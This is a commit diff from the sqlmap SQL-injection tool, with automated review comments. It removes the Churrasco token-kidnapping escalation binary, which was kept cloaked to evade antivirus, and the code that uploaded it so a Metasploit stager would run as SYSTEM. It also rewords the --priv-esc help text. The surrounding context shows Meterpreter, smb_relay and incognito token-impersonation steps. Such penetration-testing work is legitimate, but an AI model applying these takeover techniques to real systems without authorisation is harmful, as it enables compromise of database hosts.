diff --git a/doc/README.sgml b/doc/README.sgml index 92d02520b..e23358d6d 100644 --- a/doc/README.sgml +++ b/doc/README.sgml @@ -225,12 +225,13 @@ blind SQL injection. It is possible to provide a single target URL, get the list of targets from requests log file or - -conversations/ folder, get the whole HTTP request from a text -file or get the list of targets by providing sqlmap with a Google dork -which queries search engine and -parses its results page. You can also define a regular-expression based -scope that is used to identify which of the parsed addresses to test. + conversations/ folder, get the whole HTTP +request from a text file or get the list of targets by providing sqlmap +with a Google dork which queries search engine and parses its results page. You can also +define a regular-expression based scope that is used to identify which of +the parsed addresses to test. Automatically tests all provided GET parameters, POST parameters, HTTP Cookie header values and HTTP @@ -639,7 +640,7 @@ Options: --os-pwn Prompt for an out-of-band shell, meterpreter or VNC --os-smbrelay One click prompt for an OOB shell, meterpreter or VNC --os-bof Stored procedure buffer overflow exploitation - --priv-esc User priv escalation by abusing Windows access tokens + --priv-esc Database process' user privilege escalation --msf-path=MSFPATH Local path where Metasploit Framework 3 is installed --tmp-path=TMPPATH Remote absolute path of temporary files directory 
@@ -5051,11 +5052,9 @@ send the NTLM session hash when connecting to a SMB service [hh:mm:16] [INFO] which is the back-end DBMS address? [172.16.213.131] 172.16.213.131 [hh:mm:16] [INFO] which remote port numer do you want to use? [4907] 4907 [hh:mm:16] [INFO] which payload do you want to use? -[1] Reflective Meterpreter (default) -[2] PatchUp Meterpreter (only from Metasploit development revision 6742) -[3] Shell -[4] Reflective VNC -[5] PatchUp VNC (only from Metasploit development revision 6742) +[1] Meterpreter (default) +[2] Shell +[3] VNC > 1 [hh:mm:16] [INFO] which SMB port do you want to use? [1] 139/TCP (default) diff --git a/lib/contrib/tokenkidnapping/Churrasco.exe_ b/lib/contrib/tokenkidnapping/Churrasco.exe_ deleted file mode 100644 index 660f7d462..000000000 Binary files a/lib/contrib/tokenkidnapping/Churrasco.exe_ and /dev/null differ diff --git a/lib/contrib/tokenkidnapping/README.txt b/lib/contrib/tokenkidnapping/README.txt deleted file mode 100644 index d956def31..000000000 --- a/lib/contrib/tokenkidnapping/README.txt +++ /dev/null @@ -1,11 +0,0 @@ -Due to the anti-virus positive detection of executable stored inside this -folder, we needed to somehow circumvent this. As from the plain sqlmap -users perspective nothing has to be done prior to its usage by sqlmap, but -if you want to have access to the original executable use the decrypt -functionality of the ../extra/cloak/cloak.py utility. - -To prepare the executable to the cloaked form use this command: -python ../extra/cloak/cloak.py -i Churrasco.exe - -To get back the original executable use this: -python ../extra/cloak/cloak.py -d -i Churrasco.exe_ diff --git a/lib/parse/cmdline.py b/lib/parse/cmdline.py index b96f17b92..7ec114d27 100644 --- a/lib/parse/cmdline.py +++ b/lib/parse/cmdline.py 
@@ -352,8 +352,7 @@ def cmdLineParser(): "exploitation") takeover.add_option("--priv-esc", dest="privEsc", action="store_true", - help="User priv escalation by abusing Windows " - "access tokens") + help="Database process' user privilege escalation") takeover.add_option("--msf-path", dest="msfPath", help="Local path where Metasploit Framework 3 " diff --git a/lib/takeover/metasploit.py b/lib/takeover/metasploit.py index 0c960957c..38a0bcac2 100644 --- a/lib/takeover/metasploit.py +++ b/lib/takeover/metasploit.py @@ -185,7 +185,7 @@ class Metasploit: elif kb.os == "Windows" and encode: return self.__skeletonSelection("payload encoding", self.__msfEncodersList) - def __selectPayload(self, askChurrasco=True): + def __selectPayload(self): if kb.os == "Windows" and conf.privEsc: infoMsg = "forcing Metasploit payload to Meterpreter because " infoMsg += "it is the only payload that can be used to " @@ -249,19 +249,7 @@ class Metasploit: break - elif not askChurrasco: - logger.warn("beware that the VNC injection might not work") - - break - elif kb.dbms == "Microsoft SQL Server" and kb.dbmsVersion[0] in ( "2005", "2008" ): - uploaded = self.uploadChurrasco() - - if not uploaded: - warnMsg = "beware that the VNC injection " - warnMsg += "might not work" - logger.warn(warnMsg) - break elif not choice.isdigit(): @@ -312,12 +300,12 @@ class Metasploit: def __selectConnection(self): return self.__skeletonSelection("connection type", self.__msfConnectionsList) - def __prepareIngredients(self, encode=True, askChurrasco=True): + def __prepareIngredients(self, encode=True): self.connectionStr = self.__selectConnection() self.lhostStr = self.__selectLhost() self.rhostStr = self.__selectRhost() self.portStr = self.__selectPort() - self.payloadStr = self.__selectPayload(askChurrasco) + self.payloadStr = self.__selectPayload() self.encoderStr = self.__selectEncoder(encode) if self.payloadStr == "linux/x86/shell": 
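Review bot: The new `--priv-esc` help text no longer says that this escalation only applies to a Windows back-end, yet the plugins/generic/takeover.py hunk in this same commit still unsets `--priv-esc` when `kb.os != "Windows"` ("Unset --priv-esc if the back-end DBMS underlying operating system is not Windows"), so a user on another platform gets no hint from the option itself why it has no effect (presumably only a log line, which is outside the hunk). Suggest `help="Database process' user privilege escalation (Windows only)"` here, and the matching wording in the sqlmap.conf hunk, `# Database process' user privilege escalation (Windows only).`. The enclosing `cmdLineParser` function starts and ends outside the hunk.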
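Review bot: In the `@@ -249,19 +249,7 @@` hunk of lib/takeover/metasploit.py the surviving `elif kb.dbms == "Microsoft SQL Server" and kb.dbmsVersion[0] in ( "2005", "2008" ):` branch is left with only `break`, the same body as the branch immediately above it, so the DBMS/version test no longer distinguishes anything and `kb.dbmsVersion[0]` is indexed for no benefit. Either fold it into the preceding branch or drop the `elif` so the `break` is reached unconditionally. Note also that the removed `askChurrasco=False` path used to log "beware that the VNC injection might not work" for the smb_relay and remote-upload callers; after this change VNC is accepted there with no warning, so if that caveat still applies without Churrasco the warning should be kept (for example in `__forgeMsfConsoleResource`). The payload-selection loop enclosing this hunk starts and ends outside it.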
@@ -350,7 +338,7 @@ class Metasploit: def __forgeMsfConsoleResource(self): self.resourceFile = os.path.join(conf.outputPath, self.__randFile) - self.__prepareIngredients(encode=False, askChurrasco=False) + self.__prepareIngredients(encode=False) self.__resource = "use windows/smb/smb_relay\n" self.__resource += "set SRVHOST %s\n" % self.lhostStr @@ -426,9 +414,6 @@ class Metasploit: cmd = "%s &" % self.exeFilePathRemote - if self.cmdFromChurrasco and kb.stackedTest: - cmd = "%s \"%s\"" % (self.churrascoPath, cmd) - if kb.dbms == "Microsoft SQL Server" and kb.stackedTest: cmd = self.xpCmdshellForgeCmd(cmd) @@ -462,7 +447,7 @@ class Metasploit: infoMsg = "displaying the list of Access Tokens availables. " infoMsg += "Choose which user you want to impersonate by " infoMsg += "using incognito's command 'impersonate_token' if " - infoMsg += "'getsystem' did not success to elevate privileges" + infoMsg += "'getsystem' does not success to elevate privileges" logger.info(infoMsg) proc.stdin.write("list_tokens -u\n") @@ -534,7 +519,7 @@ class Metasploit: self.__shellcodeFilePath = os.path.join(conf.outputPath, "tmpm%s" % self.__randStr) self.__initVars() - self.__prepareIngredients(encode=encode, askChurrasco=False) + self.__prepareIngredients(encode=encode) self.__forgeMsfPayloadCmd(exitfunc, format, self.__shellcodeFilePath, extra) logger.debug("executing local command: %s" % self.__payloadCmd) diff --git a/plugins/generic/takeover.py b/plugins/generic/takeover.py index ebe2ad12b..ad871290a 100644 --- a/plugins/generic/takeover.py +++ b/plugins/generic/takeover.py 
@@ -54,32 +54,9 @@ class Takeover(Abstraction, Metasploit, Registry): def __init__(self): self.cmdTblName = "sqlmapoutput" self.tblField = "data" - self.cmdFromChurrasco = False Abstraction.__init__(self) - def uploadChurrasco(self): - msg = "do you want sqlmap to upload Churrasco and call the " - msg += "Metasploit payload stager as its argument so that it " - msg += "will be started as SYSTEM? [y/N] " - - output = readInput(msg, default="N") - - if output and output[0] in ( "y", "Y" ): - tmpFile = decloakToNamedTemporaryFile(os.path.join(paths.SQLMAP_CONTRIB_PATH, "tokenkidnapping", "Churrasco.exe_")) - - wFile = tmpFile.name - self.churrascoPath = "%s/tmpc%s.exe" % (conf.tmpPath, randomStr(lowercase=True)) - self.cmdFromChurrasco = True - - self.writeFile(wFile, self.churrascoPath, "binary", confirm=False) - - tmpFile.close() - - return True - else: - return False - def osCmd(self): stackedTest() @@ -172,27 +149,6 @@ class Takeover(Abstraction, Metasploit, Registry): debugMsg += "user, no need to privilege escalate" logger.debug(debugMsg) - elif kb.dbms == "PostgreSQL": - debugMsg = "by default PostgreSQL on Windows runs as postgres " - debugMsg += "user which has no access to LSASS: it is " - debugMsg += "unlikely that the privilege escalation " - debugMsg += "via 'incognito' extension will be successful" - logger.debug(debugMsg) - - elif kb.dbms == "Microsoft SQL Server" and kb.dbmsVersion[0] in ( "2005", "2008" ): - debugMsg = "often Microsoft SQL Server %s " % kb.dbmsVersion[0] - debugMsg += "runs as Network Service which has Windows " - debugMsg += "Impersonation Tokens" - logger.debug(debugMsg) - - uploaded = self.uploadChurrasco() - - if not uploaded: - debugMsg = "beware that the privilege escalation " - debugMsg += "might not work via Churrasco if " - debugMsg += "MS09-012 patch is installed" - logger.debug(debugMsg) - elif kb.os != "Windows" and conf.privEsc: # Unset --priv-esc if the back-end DBMS underlying operating # system is not Windows 
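Review bot: Removing `uploadChurrasco` from plugins/generic/takeover.py may leave names such as `decloakToNamedTemporaryFile`, `randomStr`, `paths` and `readInput` without any remaining user in this file; the import block is outside both hunks, so please check it for imports that are now unused, since a linter will flag them. `self.churrascoPath` is no longer assigned anywhere in this commit, and a quick grep for remaining readers of it (and of the `extra/cloak/cloak.py` utility that the deleted README.txt was the only visible reference to) would confirm nothing dangling is left behind. The method containing the second hunk's removed `elif` branches starts and ends outside the hunk, and the `__init__` hunk sits inside a class whose header is only shown as hunk context.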
diff --git a/sqlmap.conf b/sqlmap.conf index a2b766f1c..9e1466447 100644 --- a/sqlmap.conf +++ b/sqlmap.conf @@ -375,10 +375,9 @@ osSmb = False # Valid: True or False osBof = False -# Local User privilege escalation by abusing Windows access tokens using -# Meterpreter incognito extension. -# Note: Use in conjunction with osPwn or osSmb. It will force the payload -# to be Meterpreter. +# Database process' user privilege escalation. +# Note: Use in conjunction with osPwn, osSmb or osBof. It will force the +# payload to be Meterpreter. privEsc = False # Local path where Metasploit Framework 3 is installed.